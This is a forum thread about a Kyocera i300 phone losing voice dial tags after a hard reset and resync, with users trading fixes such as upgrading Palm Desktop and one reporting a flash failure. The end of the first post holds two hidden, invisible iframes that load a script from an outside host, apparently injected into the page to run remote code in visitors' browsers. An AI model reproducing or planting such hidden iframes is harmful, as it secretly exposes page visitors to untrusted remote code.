+ Reply to Thread
Results 1 to 5 of 5
  1. #1
    Registered User garylapointe's Avatar
    Join Date
    11-06-2001
    Location
    Dearborn, MI, USA
    Posts
    379

    Voice Dial restore after Hard Reset.

    I had to do a Hard Reset and when I re-synced it pretty much restored everything except my voice dials and also (of course) my voice memos.

    My big question is should it have restored the voices??
    (I'm using Desktop 3.1 right off the i300 CD.)

    I thought the last time I did a hard reset it kept the one test voice dial that I had done.

    It did restore my grafitti and my default phone number info and my one touch dial presets (which never stayed when I restored using my mac 2.6.3).

    Thanks,
    Gary

    A few other things were not restored:
    Eudora Web Bookmarks: was easy to fix, to point back to the correct IE bookmarks it was mimicing.
    Labels for some phone numbers: though this may have been a TrueSync problem.
    Blazer Bookmarks: I downgraded (immediately after the Hard Reset) to 1.1s6 so that might be why those went away but I thought I had the right prefs file.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    thats thje problem...


    go to palm.com and dl the palm 4.0.1 desktop.. this is what you need to save your 3rd party apps and voice speed dial #'s

  3. #3
    Registered User
    Join Date
    10-31-2001
    Posts
    40
    I'm using 4.01 and I'm still losing my voice dials. In desperation i tried Backupbuddy and I'm still losing the voice dials.

  4. #4
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    well i dont know what you guys are doing wrong..

    i only had to hard reset my 6035 ONCE when i installed the 3.5.2 update, and when i did the resync, EVEREYTHING was brought back to the phone... i have not had to do a hard reset on the i300, but there is no reason i can think of to where you wont be able to get the voice thingys back!

  5. #5
    Registered User
    Join Date
    11-13-2001
    Location
    South Florida
    Posts
    281
    Originally posted by Marctronixx
    well i dont know what you guys are doing wrong..

    i only had to hard reset my 6035 ONCE when i installed the 3.5.2 update, and when i did the resync, EVEREYTHING was brought back to the phone... i have not had to do a hard reset on the i300, but there is no reason i can think of to where you wont be able to get the voice thingys back!
    Well, it is in fact true. I have had the same problem, and today, I received a <b>FLASH FAILURE</b> while attempting to add a voice tag. Anyone have any ideas?

    Craig

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts